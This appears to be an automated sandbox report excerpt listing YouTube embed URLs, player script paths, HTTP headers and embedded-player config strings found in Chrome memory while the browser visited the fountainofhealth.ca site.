                                  Source: chrome.exe, 00000000.00000003.2342010290.000028EC04DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2499056442.000028EC0621C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/gobWGqPjSQ? equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502877436.000028EC06F59000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?siYrX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/h15NcT6Uh0? equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=jsonscriptSource equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: DM?www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsl equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2321018206.000028EC04C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Data_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2371291317.000028EC08030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2320456301.000028EC04810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( ( equals www.youtube.com (Youtube)
ginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}E_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOri
ginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}iginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOri
ginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: H4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOri
ginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true}riginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352259272.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323201812.000028EC04CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webcontent-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:35 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webp3p:CP="This is not a P3P policy! See g.co/p3phelp for more info."content-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:33 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000expires:Thu, 22 May 2025 15:06:33 GMTcache-control:private equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: I_keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.jsaDb equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},vm:function(){e=tb()},ie:function(){d()}}};var cc=wa(["data-gtm-yt-inspected-"]),GI=["www.youtube.com","www.youtube-nocookie.com"],HI,II=!1; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Mhttps://www.youtube.com/^0https://fountainofhealth.ca/ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501943849.000028EC06D2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: Oript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}AYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: RJhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: SKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Science of THRIVE Approach3+https://www.youtube.com/watch?v=gobWGqPjLSQ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Times New RomanE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Times New RomanE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Watch on YouTubenfhttps://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Welcome to Thrive Learning3+https://www.youtube.com/watch?v=h15NcT6UXh0 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323428029.000028EC04BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323165506.000028EC04C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
